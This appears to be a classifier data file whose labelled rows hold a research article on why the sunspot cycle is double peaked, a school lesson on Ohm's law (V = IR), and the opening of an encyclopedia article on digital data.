content
string
pred_label
string
pred_score
float64
About this Journal Submit a Manuscript Table of Contents ISRN Astronomy and Astrophysics Volume 2011 (2011), Article ID 437838, 11 pages doi:10.5402/2011/437838 Research Article Why the Sunspot Cycle Is Double Peaked Space and Solar-Terrestrial Research Institute, Bulgarian Academy of Sciences, 1000 Sofia, Bulgaria Received 31 January 2011; Accepted 28 February 2011 Academic Editors: M. Ding and S. Jefferies Copyright © 2011 K. Georgieva. This is an open access article distributed under the Creative Commons Attribution License, which permits unrestricted use, distribution, and reproduction in any medium, provided the original work is properly cited. Abstract Many sunspot cycles are double peaked. In 1967, Gnevyshev suggested that actually all cycles have two peaks generated by different physical mechanisms, but sometimes the gap between them is too short for the maxima to be distinguished in indices of the total sunspot activity. Here, we show that indeed all cycles have two peaks easily identified in sunspot activity in different latitudinal bands. We study the double peaks in the last 12 sunspot cycles and show that they are manifestation of the two surges of toroidal field—the one generated from the poloidal field advected all the way on the surface to the poles, down to the tachocline and equatorward to sunspot latitudes, and another one generated from the poloidal field diffused at mid-latitudes from the surface to the tachocline and transformed there into toroidal field. The existence of these two surges of toroidal field is due to the relative magnitudes of the speed of the large-scale solar meridional circulation and the diffusivity in the solar convection zone which are estimated from geomagnetic data. 1. Introduction By the term “solar activity,” usually any type of variation in the appearance or energy output of the Sun, is understood. Elements of solar activity are sunspots, solar flares, coronal mass ejections, coronal holes, total and spectral solar irradiance, and so forth. The most prominent evidence of solar activity and with the longest data record, though not geoeffective themselves but related to geoeffective active regions, are sunspots. Very big sunspots can be seen with naked eye, and old chronicles testify that they have been indeed observed even in ancient times. There is evidence that the Greeks knew of them at least by the 4th century BC, and the earliest records of sunspots observed by Chinese astronomers are from 28 BC. However, systematic observations of sunspots began only early in the 17th century after the telescope was invented. As many other great discoveries, the sunspot cycle was discovered by chance. Heinrich Schwabe, a German pharmacist and amateur astronomer, was convinced that there must be a planet, tentatively called Vulcan, inside the orbit of Mercury. Because of the close proximity to the Sun, it would have been very difficult to observe Vulcan, and Schwabe believed one possibility to detect the planet might be to see it as a dark spot when passing in front of the Sun. For 17 years, from 1826 to 1843, on every clear day, Schwabe would scan the Sun and record its spots trying to detect Vulcan among them. He did not find the planet but noticed the regular variation in the number of sunspots with a period of approximately 11 years, and published his findings in a short article entitled “Solar observations during 1843” [1]. Apart from the observation that the number and area of sunspots increase and decrease cyclically every ~11 years, several other features of the sunspot cycle have to be taken into account in any theory trying to explain solar activity. The most important one is the finding of Hale published in 1908 [2] that sunspots are associated with strong magnetic fields, that sunspots tend to occur in pair, that on one hemisphere, the leading (with respect to the direction of the solar rotation) spots in all pairs have the same polarity, and the trailing spots in the pairs have the other polarity, while on the other hemisphere, the polarities are oppositely oriented, and that in subsequent 11-yr sunspot cycles, the polarities in the two hemispheres reverse [3]. Also, as the new solar cycle begins, sunspots first appear at higher heliolatitudes, and as the cycle approaches minimum, their emergence zone moves equatorward—a rule known as Spörer's law but actually discovered by Spörer's contemporary Carrington [4]. Another empirical rule important for understanding the sunspot cycle is Joy’s law stating that the leading sunspot in a sunspot pair appears at lower heliolatitudes than the trailing sunspot, and the inclination of the sunspot pair relative to the equator increases with increasing latitude [5]. According to the solar dynamo theory developed by Parker in 1955 [6], the sunspot cycle is produced by an oscillation between toroidal and poloidal components, similar to the oscillation between kinetic and potential energies in a simple harmonic oscillator. The differential rotation at the base of the solar convection zone stretches the north-south field lines of the poloidal magnetic field predominant in sunspot minimum in east-west direction, thus creating the toroidal component of the field. The buoyant magnetic flux-tubes emerge piercing the solar surface in two spots with opposite polarities—sunspots. This theory explains why sunspots appear in pairs, why the leading sunspots have the polarity of their respective poles, and why the polarities in the two hemispheres are opposite. To complete the cycle, the toroidal field must be next transformed back into poloidal field with the opposite magnetic polarity. Several classes of possible mechanisms are proposed to explain this process [7]. The most promising one recently is considered to be the so-called flux-transport dynamo mechanism first defined by Babcock in 1961 [8] and mathematically developed by Leighton in 1969 [9]. Due to the Coriolis force acting upon the emerging field tubes, according to Joy’s law, the leading polarity sunspots are at lower heliolatitudes than the trailing polarity sunspots. Late in the solar cycle when sunspot pairs appear at very low heliolatitudes, the leading polarity sunspots diffuse across the equator and cancel with the leading polarity sunspots of the opposite hemisphere. The trailing polarity sunspots and the remaining sunspot pairs are carried toward the poles, where the excess trailing polarity flux first cancels the flux of the old solar cycle and then accumulates to form the poloidal field of the new cycle with polarity opposite to the one in the preceding cycle. Wang et al. [10] suggested that this flux-transport dynamo includes a large-scale meridional circulation in the solar convection zone which carries the remnants of sunspot pairs poleward at the surface. This circulation has been directly observed and confirmed from helioseismology (see [11] and references therein and [1214]), magnetic butterfly diagram [15, 16], latitudinal drift of sunspots [17]. For mass conservation, the surface poleward circulation must be balanced by a deep counterflow at the base of the convection zone carrying the poloidal field back to low latitudes, transforming it on the way into toroidal field which emerges as the sunspots of the next cycle. This deep counterflow has not been yet observed, but it has been estimated by the equatorward drift of the sunspot occurrence latitudes [18, 19]. Actually, this deep circulation carrying like a conveyor belt the flux equatorward explains the so-called Spörer’s law—the equatorward motion of the sunspot occurrence zone. Gnevyshev [20] studied the evolution of the intensity of the solar coronal line at 5303 Å in different latitudinal bands during the 19th sunspot cycle and found that there were actually two maxima in the 19th cycle: the first one, during which the coronal intensity increased and subsequently decreased simultaneously at all latitudes, appeared in 1957; the second maximum appeared in 1959-1960 and was only observed at low latitudes, but below 15°, it was even higher than the first maximum. Antalova and Gnevyshev [21] checked whether this is a feature of the 19th cycle only or of all cycles. They superposed the sunspot curves of all sunspot cycles from 1874 to 1962 and got the same result that there are always two maxima in the sunspot cycle: the first one applies to all latitudes and appears simultaneously at all latitudes, and the second one occurs only at low latitudes. The relative amplitude of the two peaks and the time interval between them vary, so in some cycles, they are seen as a single peak in latitudinal averages, while in other cycles, the gap between them known as “Gnevyshev gap” is clearly seen (Figure 1). Here and further, we use monthly values of the sunspot area smoothed by 13-point running averages with weight 0.5 for the first and last point and 1 for the other points [22]. 437838.fig.001 Figure 1: Total global sunspot area with the Gnevyshev gap seen in some of the cycles. For example, Norton and Gallagher [23], studying the sunspot area and sunspot number summed over the whole northern and southern hemispheres and over the whole disc, found Gnevyshev gaps in only 8 out of 12 cycles. However, when looking at different latitudinal bands, the Gnevyshev gap is clearly seen even in the cycles in which it is absent in the hemispheric or global totals. Figure 2 presents cycle 15 which according to [23] is singlepeaked in the northern hemisphere and in the global sunspot area but has two very distinct peaks appearing in different periods and in different latitudinal bands. fig2 Figure 2: (a) Total sunspot area in cycle 15; (b) sunspot area in separate latitudinal bins, averages over the two solar hemispheres. According to Gnevyshev [24], the two maxima in sunspot activity result from different physical processes, and their existence means that the apparent gradual displacement of the sunspot occurrence zone to the equator is due to the superposition and changing relative importance of the two consecutive maxima. This conclusion, that the equatorward motion of the sunspot appearance zone is only apparent and is actually due to the superposition of the two different sunspot maxima, contradicts the explanation that it follows from the equatorward deep meridional circulation which is a critical part of the solar flux-transport dynamo theory. The goal of the present study is to try to find an explanation of the double-peaked sunspot cycle in the framework of the flux-transport dynamo mechanism. 2. Diffusion and Advection The relation between the speed of the meridional circulation and the magnitude of the sunspot cycle is an indication of the regime of operation of the solar dynamo determined by the relative importance of advection (transport by the meridional circulation) and diffusion [25]. If advection is more important than diffusion in the upper part of the solar convection zone involved in poleward transport, a faster poleward circulation means less time for the leading polarity sunspots to cancel with their counterparts from the opposite hemisphere. On the way to the poles, the leading and trailing polarity flux will cancel each other, and with less excess trailing polarity flux, less trailing polarity flux will reach uncanceled the poles to neutralize the polar field of the old cycle and to create the poloidal field of the new cycle. From this weaker poloidal field, weaker toroidal field will be generated, and the number of sunspots which are the manifestation of the toroidal field will be lower. In this case, there will be anticorrelation between the speed of the poleward meridional circulation and the amplitude of the following sunspot maximum. If diffusion is more important than advection, the leading polarity flux will have enough time to cancel with the leading polarity flux of the opposite hemisphere, but the slower circulation will mean more time for diffusive decay of the flux during its transport to the pole, and hence, a weaker poloidal field will result, respectively, a weaker toroidal field of the next cycle. In this case, there will be correlation between the speed of the poleward meridional circulation and the amplitude of the following sunspot maximum. If diffusion is more important than advection at the base of the solar convection zone, where the toroidal field is generated, a faster equatorward circulation there will mean less time for diffusive decay of the flux during its transport through the convection zone, therefore stronger toroidal field and higher sunspot maximum of the next cycle. If advection is more important, higher speed will mean less time for generation of toroidal field, weaker toroidal field and lower sunspot maximum [26]. Unfortunately, both the speed of the solar meridional circulation and the diffusivity in the solar convection zone are largely unknown. Direct measurements of the surface meridional circulation are only available for less than three sunspot cycles [11, 27, 28], but its long-term variations and their correlation with the amplitude of the sunspot cycle are not known. The deep equatorward circulation has not been measured at all; its magnitude has only been estimated from the equatorward movement of the sunspot appearance zone [18]. The diffusivity in the upper part of the solar convection zone is estimated from the observed turbulent velocities and size of the convection cells, but its radial profile is completely unknown. Different authors have assumed different speeds of the surface and deep meridional circulation and different values and radial distribution of the turbulent diffusivity, and based on the same flux-transport model, they have obtained drastically different forecasts for the forthcoming solar cycle 24 [29]. We have proposed a method to evaluate the speed of the surface and deep meridional circulation from geomagnetic data [30]. Here, we briefly explain this method and apply it to estimate the regime of operation of the solar dynamo and the origin of the two peaks of sunspot activity in the solar cycle. 3. Derivation of the Solar Meridional Circulation and Diffusivity Even though we have no direct long-term observations of various solar processes, we do have means to reconstruct them. The Earth itself is sort of a probe registering solar variability, and records of the Earth’s magnetic field contain evidence of Sun’s activity effects. The Earth’s intrinsic magnetic field is basically dipolar, resembling the field of a bar magnet. Its magnitude is of order ~0.3 G (30,000 nT) at the Earth's surface near the magnetic equator and twice that at the poles. At times of enhanced energy input as a result of the action of solar activity agents, the magnetic field is disturbed and its magnitude varies by about a percent of the main field due to currents in the ionosphere and magnetosphere. Two types of solar activity agents are responsible for these geomagnetic disturbances, corresponding to the two faces of the sun’s magnetism—the toroidal and poloidal components of the solar magnetic field. The coronal mass ejections—huge bubbles of plasma with embedded magnetic fields ejected from the solar corona, which like the number of sunspots are manifestation of the solar torroidal field, and the high speed solar wind streams, emanating from solar coronal holes, manifestation of the solar poloidal field. Consequently, geomagnetic activity has two peaks in the 11-year solar cycle (Figure 3). 437838.fig.003 Figure 3: Geomagnetic aa-index (blue) and sunspot number (red) since the beginning of the aa-index record. The first peak is due to solar coronal mass ejections which have maximum in number and intensity at sunspot maximum, and hence, it coincides with the sunspot maximum. The second one is caused by high speed solar wind streams from solar coronal holes which have maximum on the sunspot declining phase [31, 32]. Like the peak in the number of sunspots, the first peak in geomagnetic activity can also be double or even multiple [33]. Figure 4 is an example of a cycle with a clearly visible double peak in sunspot activity reflected in geomagnetic activity (1989 and 1991) and a second peak in geomagnetic activity on the declining phase of the sunspot cycle (1994). 437838.fig.004 Figure 4: Two geomagnetic activity maxima in the sunspot cycle used for the calculation of the speed of the surface poleward circulation: from the time between sunspot max and the following aa max (pink) and of the deep equatorward circulation from the time between aa max and the following sunspot max (cyan). What is the timing of the geomagnetic activity peak due to high speed solar wind from coronal holes? Coronal holes are observed at any time of the sunspot cycle, but their effect on the Earth varies. In sunspot minimum, there are big polar coronal holes which, however, do not affect the Earth, because the fast solar wind emanating from them does not reach the ecliptic (Figure 5(a)). In sunspot maximum, there are small short-lived coronal holes scattered at all latitudes, giving rise to short and relatively weak high speed streams (Figure 5(b)). As shown by Wang et al. [34], geomagnetic activity reaches a maximum on the sunspot declining phase when polar coronal holes have already formed and low latitude holes begin attaching themselves to their equatorward extensions and growing in size, so the Earth is embedded in wide and long-lasting fast solar wind streams (Figure 5(c)). fig5 Figure 5: (a) Sunspot min: large polar coronal holes; no coronal holes at low latitudes; (b) Sunspot max: small scattered short-living coronal hole at all latitudes; (c) Decline phase, when the trailing polarity flux reaches the poles. Coronal holes data compiled by K. Harvey and F. Recely using NSO KPVT observations under a grant from the NSF. We, therefore, assume that the geomagnetic activity maximum on the declining phase of the sunspot cycle appears when the flux from sunspot latitudes has reached the poles. Hence, the time between sunspot maximum and geomagnetic activity maximum on the sunspot declining phase is the time it takes the solar surface meridional circulation to carry the remnants of sunspot pairs from sunspot latitudes to the poles, so from this time, we can calculate the average speed of the surface poleward circulation 𝑉 s u r f (Figure 6(a)). fig6 Figure 6: (a) The distance traversed by the surface poleward circulation between sunspot maximum and the following geomagnetic activity maximum; (b) The calculated speed of the surface poleward meridional circulation 𝑉 s u r f (blue line; note the reversed scale) and amplitude of the following sunspot cycle (red line). High and statistically significant anticorrelation is found between 𝑉 s u r f and the amplitude of the following sunspot cycle: 𝑟 = 0 . 7 with 𝑃 = . 0 3 (Figure 6(b); note the reversed scale of 𝑉 s u r f ). This means that advection is more important than diffusion in the upper part of the solar convection zone. In order to check the reliability of the method, we compare the results to the available observational data. In the interval between sunspot cycle 10 and 23, 𝑉 s u r f calculated by our method varies between 4 and 18 m/s averaged over latitude and over time. In the last cycle 23 for which direct observations are available, the calculated speed is 16 m/s and agrees remarkably well with results from helioseismology and magnetic butterfly diagrams which show latitude-dependent speed profile smoothly varying from 0 m/s at the equator to 20–25 m/s at midlatitudes to 0 m/s at the poles [11, 13]. From the time between the geomagnetic activity maximum on the sunspot declining phase and the following sunspot maximum (Figure 4), we can calculate the speed of the deep meridional circulation and/or the diffusivity in the bulk of the solar convection zone. What this time reflects depends on the diffusivity in the upper part of the convection zone. Three cases are possible according to the classification of Hotta and Yokoyama [35] and the estimations of Jiang et al. [36]: very low diffusivity (advection dominated regime), very high diffusivity (strongly diffusion dominated regime), and moderate diffusivity (moderately diffusion dominated regime). 3.1. Advection Dominated Regime If the diffusivity in the upper part of the convection zone is very low which, according to Jiang et al. [36] means 𝜂 1 0 7  m2/s, the flux will make one full circle from sunspot latitudes to the poles, down to the tachocline and back to sunspot latitudes (Figure 7(a)). In this case, the time between the geomagnetic activity maximum on the sunspot declining phase and the next sunspot maximum is the time for the flux to sink to the base of the convection zone at polar latitudes, to be carried by the deep equatorward circulation to the equator, and to emerge as the sunspots of the new cycle. Assuming the speed of the downward transport of the flux equal to the speed of the deep equatorward circulation [36] and the time for the field tubes to emerge from the base of the convection zone to the surface equal to three months according to Fisher et al. [37], we can calculate the speed of the deep meridional circulation 𝑉 d e e p (Figure 7(b)). fig7 Figure 7: (a) The distance traversed by the circulation between geomagnetic activity maximum and the following sunspot maximum in the case of very low diffusivity; (b) The calculated speed of the deep equatorward meridional circulation 𝑉 d e e p (blue line) and amplitude of the following sunspot cycle (red line). The calculated 𝑉 d e e p is between 2.5 and 5 m/s averaged over latitude and cycle, in excellent agreement with the estimations from the movement of the sunspot appearance zone [18] of speeds between 1.5 and 3 m/s at sunspot maximum, decreasing from high to low latitudes and from the beginning to the end of the cycle. This gives us further confidence in the reliability of the method. The correlation between 𝑉 d e e p and the amplitude of the following sunspot cycle is positive and highly statistically significant ( 𝑟 = 0 . 7 9 with 𝑃 < . 0 0 1 ). From the sign of this correlation, we can evaluate the relative importance of diffusion and advection in the bottom part of the solar convection zone. The positive correlation obvious in Figure 7(b) means that diffusion is more important than advection there, so faster circulation means less time for diffusive decay of the flux during its transport through the convection zone, therefore stronger toroidal field and higher sunspot maximum of the next cycle. 3.2. Strongly Diffusion Dominated Regime The other extreme—very high diffusivity and strongly diffusion-dominated regime in the upper part of the convection zone—occurs when 𝜂 2 - 9 1 0 8  m2/s and 𝜂 / 𝑢 0 > 2 1 0 7  m, where 𝑢 0 is the maximum surface circulation speed [35]. In this case, the time from the geomagnetic activity maximum on the sunspot declining phase to the next sunspot maximum will be the time it takes the flux to diffuse through the convection zone 𝑇 = 𝐿 2 / 𝜂 , where 𝐿 is the thickness of the convection zone (Figure 8(a)), and from it, we can calculate the average diffusivity in the bulk of the convection zone and the ratio 𝜂 / 𝑢 0 (Figure 8(b)). This is the upper limit of diffusivity, because it is calculated under the assumption that all of the flux diffuses directly to the tachocline before it can reach the poles. fig8 Figure 8: (a) Diffusion through the convection zone in the case of very high diffusivity in the upper part of the convection zone. (b) The calculated diffusivity in the upper part of the solar convection zone 𝜂 (blue line) and ratio of the diffusivity to the maximum surface circulation 𝜂 / 𝑢 0 (green line). The values presented in Figure 8(b) are supported by estimations of the diffusivity in the upper part of the convection zone based on the observed turbulent velocities and size of convection cells [9, 38] and considerations about the correlation between the two solar hemispheres and between the strength of the polar field and the amplitude of the following sunspot maximum [36]. 4. The Sunspot Cycle in Moderately Diffusion-Dominated Regime As seen from Figure 8(b), even under the assumption of strong diffusion so that that all of the flux diffuses through the convection zone before reaching the poles, both calculated 𝜂 ( 1 - 2 1 0 8 ) and 𝜂 / 𝑢 0 ( 5 1 0 6 - 2 1 0 7 ) are not high enough for strongly diffusion-dominated regime and on the other hand not low enough for fully advection-dominated regime. According to Jiang et al. [36], in the case of intermediate diffusivity 𝜂 1 - 2 1 0 8  m2/s (moderately diffusion-dominated regime), a part of the flux shortcircuits of the meridional circulation, another part makes a full circle to the poles down to the base of the convection zone and equatorward to sunspot latitudes (Figure 9). 437838.fig.009 Figure 9: Moderately diffusion-dominated regime: a part of the flux diffuses through the convection zone, “short-circuiting” the meridional circulation; another part makes a full circle to the poles, down to the base of the convection zone and equatorward to sunspot latitudes. If the solar dynamo operates in moderately diffusion-dominated regime in the upper part of the convection zone, the sunspot cycle will be a superposition of two surges of toroidal field: one generated from the poloidal field diffused across the convection zone and another one from the poloidal field advected by the meridional circulation. To check this, we have plotted the sunspot area as a function of time and latitude (from http://solarscience.msfc.nasa.gov/greenwch.shtml). The sunspot area is given in 50 latitude bins (25 in each hemisphere) distributed uniformly in Sine (latitude) for each sunspot cycle from 12 to 23. Here, we have used the averages over the two hemispheres in the respective bins. Figures 10(a) and 10(b) demonstrate the two peaks in cycle 16. The first one is centered at Carrington rotation 965 and appears simultaneously in a wide latitudinal range between 26.1 and 18.7° heliolatitude; the second one appears later and moves from 16.3° in Carrington rotation 981, to 13.9° in rotation 1003, to 9.2° in rotation 1018, and to 4.6° in rotation 1024. We identify the first peak with the flux diffused across the convection zone, and the second one—with the flux advected all the way to the poles, down to the tachocline and back equatorward to sunspot latitudes. Figure 10(c) presents a surface plot of the sunspot area in cycle 16 (averaged over the two hemispheres) as a function of time and latitude. The cyan lines delineate the evolution of the two surges of sunspot activity, with the vertical lines indicating the diffusive generated peak occurring simultaneously in a wide latitudinal interval and the tilted lines indicating the advection dominated peak progressing equatorward. fig10 Figure 10: Evolution of the sunspot area in cycle 16: (a) The peak appears simultaneously at areas between 26.1° and 18.7°. (b) The peak at lower latitudes appears later and moves further equatorward with time. (c) Surface plot of the sunspot area in cycle 16 (averaged over the two hemispheres) as a function of time and latitude. The diffusion generated peak seems to appear earlier and at higher heliolatitudes in all cycles from 15 to 19. The order is reversed in cycles 12–14 and 20–23: first the advection generated peak at higher latitudes, then the diffusion generated peak at lower latitudes. An example (cycle 21) is shown in Figure 11. First, the advection-generated peak appears at Carrington rotation 1650 and moves to rotation 1690 from about 20° to about 10°; the second peak, centered around Carrington rotation 1705, appears simultaneously at all latitudes below 15°. 437838.fig.0011 Figure 11: The same as Figure 10(c) for cycle 21. Figure 12 presents the surface plots of the sunspot area in all cycles from 12 to 23 (averaged over the two hemispheres) as a function of time and latitude. Note that the colour codes are different in the plots for the different cycles. fig12 Figure 12: The same as Figure 10(c) for cycles from (a) to (l). Note that the colour code is different for the different plots. It seems that the order changes either in ascending and descending phases of the secular cycle or in consecutive secular cycles (Figure 13). At present, it is difficult to understand the reason for this, but it obviously has a connection with the long-term variations in solar activity and can give additional information about solar dynamo. 437838.fig.0013 Figure 13: Advection-dominated before diffusion-dominated peak (a-d) and diffusion-dominated before advection-dominated peak (d-a) in the secular solar cycle. 5. Summary and Conclusion Solar dynamo can operate in different regimes determined by the relative importance of diffusion and advection in the upper and bottom parts of the solar convection zone. Based on estimations for the speed of the surface poleward meridional circulation and diffusion in the upper part of the convection zone, we have demonstrated that the dynamo operates there in moderately diffusion dominated regime, in which a part of the flux short-circuits the meridional circulation and diffuses directly to the bottom of the convection zone at midlatitudes, another part makes a full circle to the poles, down to the base of the convection zone and equatorward to sunspot latitudes. These two parts of the flux, when transformed by the differential rotation at the base of the convection zone, give rise to two peaks of sunspot activity, which are close but not exactly coinciding. In this way, the double-peaked sunspot cycle and the Gnevyshev gap have their natural explanation in the flux transport dynamo theory. References 1. H. Schwabe, “Sonnen beobachtungen im Jahre 1843,” Astronomische Nachrichten, vol. 21, pp. 233–236, 1844. 2. G. E. Hale, “On the Probable Existence of a Magnetic Field in Sun-Spots,” Astrophysical Journal, vol. 28, pp. 315–348, 1908. 3. G. E. Hale and S. B. Nicholson, “The law of sun-spot polarity,” Monthly Notices of the Royal Astronomical Society, vol. 85, pp. 270–300, 1925. 4. R. C. Carrington, “On the distribution of the solar spots in latitudes since the beginning of the year 1854, with a map,” Monthly Notices of the Royal Astronomical Society, vol. 19, pp. 1–3, 1985. 5. G. E. Hale, F. Ellerman, S. B. Nicholson, and A. H. Joy, “The magnetic polarity of sun-spots,” Astrophysical Journal, vol. 49, pp. 153–186, 1919. 6. E. Parker, “Hydromagnetic dynamo models,” Astrophysical Journal, vol. 122, pp. 293–314, 1955. 7. P. Charbonneau, “Dynamo models of the solar cycle,” Living Reviews in Solar Physics, vol. 7, no. 3, 2010. 8. H. W. Babcock, “The topology of the sun's magnetic field and the 22-year cycle,” The Astrophysical Journal, vol. 133, pp. 572–587, 1961. 9. R. Leighton, “A magneto-kinematic model of the solar cycle,” The Astrophysical Journal, vol. 156, pp. 1–26, 1969. 10. Y. M. Wang, N. R. Sheeley, and A. G. Nash, “A new solar cycle model including meridional circulation,” Astrophysical Journal, vol. 383, no. 1, pp. 431–442, 1991. View at Scopus 11. D. H. Hathaway, “Doppler measurements of the Sun's meridional flow,” Astrophysical Journal, vol. 460, no. 2, pp. 1027–1033, 1996. View at Scopus 12. V. I. Makarov, A. G. Tlatov, and K. R. Sivaraman, “Does the poleward migration rate of the magnetic fields depend on the strength of the solar cycle?” Solar Physics, vol. 202, no. 1, pp. 11–26, 2001. View at Publisher · View at Google Scholar · View at Scopus 13. J. Zhao and A. G. Kosovichev, “Torsional oscillation, meridional flows, and vorticity inferred in the upper convection zone of the sun by time-distance helioseismology,” Astrophysical Journal, vol. 603, no. 2, pp. 776–784, 2004. View at Publisher · View at Google Scholar · View at Scopus 14. I. G. Hernández, R. Komm, F. Hill, R. Howe, T. Corbard, and D. A. Haber, “Meridional circulation variability from large-aperture ring-diagram analysis of global oscillation network group and michelson doppler imager data,” Astrophysical Journal, vol. 638, no. 1, pp. 576–583, 2006. View at Publisher · View at Google Scholar · View at Scopus 15. E. V. Ivanov, V. N. Obridko, and B. D. Shelting, “Meridional drifts of large-scale solar magnetic fields and meridional circulation,” in Proceedings of the 10th European Solar Physics Meeting, Solar Variability: From Core to Outer Frontiers, pp. 851–854, Prague, Czech Republic, September 2002. 16. M. Švanda, A. G. Kosovichev, and J. Zhao, “Speed of meridional flows and magnetic flux transport on the sun,” Astrophysical Journal, vol. 670, no. 1, pp. L69–L72, 2007. View at Publisher · View at Google Scholar · View at Scopus 17. J. Javaraiah and R. K. Ulrich, “Solar-cycle-related variations in the solar differential rotation and meridional flow: a comparison,” Solar Physics, vol. 237, no. 2, pp. 245–265, 2006. View at Publisher · View at Google Scholar · View at Scopus 18. D. H. Hathaway, D. Nandy, R. M. Wilson, and E. J. Reichmann, “Evidence that a deep meridional flow sets the sunspot cycle period,” Astrophysical Journal, vol. 589, no. 1, pp. 665–670, 2003. View at Publisher · View at Google Scholar · View at Scopus 19. D. H. Hathaway, D. Nandy, R. M. Wilson, and E. J. Reichmann, “Evidence that a deep meridional flow sets the sunspot cycle period,” Astrophysical Journal, vol. 602, no. 1, p. 543, 2004. View at Scopus 20. M. N. Gnevyshev, “The corona and the 11-year cycle of solar activity,” Soviet Astronomy—AJ, vol. 7, no. 3, pp. 311–318, 1963. 21. A. Antalova and M. N. Gnevyshev, “Principal characteristics of the 11-year solar activity cycle,” Astronomicheskii Zhurnal, vol. 42, pp. 253–258, 1965. 22. W. Gleissberg, “A table of secular variations of the solar cycle, terrestrial magnetisn and atmospheric,” Electricity, vol. 49, pp. 243–244, 1944. 23. A. A. Norton and J. C. Gallagher, “Solar-cycle characteristics examined in separate hemispheres: phase, gnevyshev gap, and length of minimum,” Solar Physics, vol. 261, no. 1, pp. 193–207, 2009. View at Publisher · View at Google Scholar · View at Scopus 24. M. N. Gnevyshev, “On the 11-years cycle of solar activity,” Solar Physics, vol. 1, no. 1, pp. 107–120, 1967. View at Publisher · View at Google Scholar · View at Scopus 25. D. H. Hathaway and L. Rightmire, “Variations in the Sun's meridional flow over a solar cycle,” Science, vol. 327, no. 5971, pp. 1350–1352, 2010. View at Publisher · View at Google Scholar · View at PubMed · View at Scopus 26. A. R. Yeates, D. Nandy, and D. H. Mackay, “Exploring the physical basis of solar cycle predictions: flux transport dynamics and persistence of memory in advection-versus diffusion-dominated solar convection zones,” Astrophysical Journal, vol. 673, no. 1, pp. 544–556, 2008. View at Publisher · View at Google Scholar · View at Scopus 27. R. K. Ulrich and J. E. Boyden, “The solar surface toroidal magnetic field,” Astrophysical Journal, vol. 620, no. 2, pp. L123–L127, 2005. View at Publisher · View at Google Scholar · View at Scopus 28. M. Dikpati, P. A. Gilman, G. De Toma, and R. K. Ulrich, “Impact of changes in the Sun's conveyor-belt on recent solar cycles,” Geophysical Research Letters, vol. 37, no. 14, Article ID L14107, 2010. View at Publisher · View at Google Scholar 29. D. H. Hathaway, “Solar cycle forecasting,” Space Science Reviews, vol. 144, no. 1–4, pp. 401–412, 2009. View at Publisher · View at Google Scholar · View at Scopus 30. K. Georgieva and B. Kirov, “Solar dynamo and geomagnetic activity,” Journal of Atmospheric and Solar-Terrestrial Physics, vol. 73, no. 2-3, pp. 207–222, 2011. View at Publisher · View at Google Scholar · View at Scopus 31. W. D. Gonzalez, B. T. Tsurutani, and A. L. Clúa De Gonzalez, “Interplanetary origin of geomagnetic storms,” Space Science Reviews, vol. 88, no. 3-4, pp. 529–562, 1999. View at Scopus 32. W. D. Gonzalez, B. T. Tsurutani, and A. L. Clúa de Gonzalez, “Geomagnetic storms contrasted during solar maximum and near solar minimum,” Advances in Space Research, vol. 30, no. 10, pp. 2301–2304, 2002. View at Publisher · View at Google Scholar · View at Scopus 33. R. P. Kane, “Which one is the 'Gnevyshev' GAP?” Solar Physics, vol. 229, no. 2, pp. 387–407, 2005. View at Publisher · View at Google Scholar · View at Scopus 34. Y. M. Wang, N. R. Sheeley, and J. Lean, “Meridional flow and the solar cycle variation of the Sun's open magnetic flux,” Astrophysical Journal, vol. 580, no. 2, pp. 1188–1196, 2002. View at Publisher · View at Google Scholar · View at Scopus 35. H. Hotta and T. Yokoyama, “Importance of surface turbulent diffusivity in the solar flux-transport dynamo,” The Astrophysical Journal, vol. 709, no. 2, pp. 1009–1017, 2010. 36. J. Jiang, P. Chatterjee, and A. R. Choudhuri, “Solar activity forecast with a dynamo model,” Monthly Notices of the Royal Astronomical Society, vol. 381, no. 4, pp. 1527–1542, 2007. View at Publisher · View at Google Scholar 37. G. H. Fisher, Y. Fan, D. W. Longcope, M. G. Linton, and W. P. Abbett, “Magnetic flux tubes inside the sun,” Physics of Plasmas, vol. 7, no. 5, pp. 2173–2179, 2000. 38. A. Ruzmaikin and S. A. Molchanov, “A model of diffusion produced by a cellular surface flow,” Solar Physics, vol. 173, no. 2, pp. 223–231, 1997. View at Scopus
__label__pos
0.818128
Albert Teen powered by Albert logo YOU ARE LEARNING: V = IR V = IR V = IR We can calculate the current, resistance and voltage using the equation V = I x R. Which letter do we use to represent the voltage in a circuit? Which letter do you think we use to represent the resistance in the circuit? Which of the following letters do we use to represent the current in a circuit? A circuit has a current of 2, a voltage of 10 and a resistance which equals 5. Which of these is correct formula for calculating resistance? How can we rearrange the formula R=VIR=\frac{V}{I} to make VV the subject? 1 The image shows how we can calculate the voltage, resistance and current in a circuit and how they are related to each other. You place your thumb over the one you want to find and the rest of the triangle shows what should be multiplied by what, or what should be divided by what. Do you think the resistance in all types of resistors is constant, or can resistance vary? Whilst normal resistors have a constant resistance, there is a type of resistor where we can change the resistance. We call them variable resistors. We can change the resistance in them and calculate the change in current. Imagine that we plot a graph of voltage, VV, against current, II. What would the slope of the line show? 1 This graph shows the voltage plotted agaisnt the current for a circuit. What does the gradient or slope of the line represent? 2 This graph shows the voltage and current for a circuit. The gradient of the line is the resistance. Remember that we find resistance by dividing voltage (on the y-axis) by current (on the x-axis) like this: R=VIR=\frac{V}{I} 3 Is the slope of the line constant or changing? 4 What can we say about the relationship between the voltage and the current? A) They are inversely proportional. B) They are directly proportional. Answer A or B.
__label__pos
1
Digital data From Wikipedia, the free encyclopedia Jump to: navigation, search This article is about broad technical and mathematical information regarding digital data. For alternate or more specific uses, see Digital (disambiguation). Digital data, in information theory and information systems, are discrete, discontinuous representations of information or works, as contrasted with continuous, or analog signals which behave in a continuous manner, or represent information using a continuous function. Although digital representations are the subject matter of discrete mathematics, the information represented can be either discrete, such as numbers and letters, or it can be continuous, such as sounds, images, and other measurements. The word digital comes from the same source as the words digit and digitus (the Latin word for finger), as fingers are often used for discrete counting. Mathematician George Stibitz of Bell Telephone Laboratories used the word digital in reference to the fast electric pulses emitted by a device designed to aim and fire anti-aircraft guns in 1942.[1] The term is most commonly used in computing and electronics, especially where real-world information is converted to binary numeric form as in digital audio and digital photography. Symbol to digital conversion[edit] Since symbols (for example, alphanumeric characters) are not continuous, representing symbols digitally is rather simpler than conversion of continuous or analog information to digital. Instead of sampling and quantization as in analog-to-digital conversion, such techniques as polling and encoding are used. A symbol input device usually consists of a group of switches that are polled at regular intervals to see which switches are switched. Data will be lost if, within a single polling interval, two switches are pressed, or a switch is pressed, released, and pressed again. This polling can be done by a specialized processor in the device to prevent burdening the main CPU. When a new symbol has been entered, the device typically sends an interrupt, in a specialized format, 